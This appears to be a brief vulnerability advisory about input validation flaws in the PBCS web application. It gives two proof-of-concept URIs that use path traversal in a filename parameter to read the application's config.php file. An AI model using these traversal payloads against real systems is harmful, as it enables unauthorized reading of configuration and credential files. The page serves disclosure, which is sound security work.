PBCS Multiple Input Validation Vulnerabilities

info
discussion
exploit
solution
references

PBCS Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
http://www.example.com/plugins/system-logger/print_logs.php?filename=../../config/config.php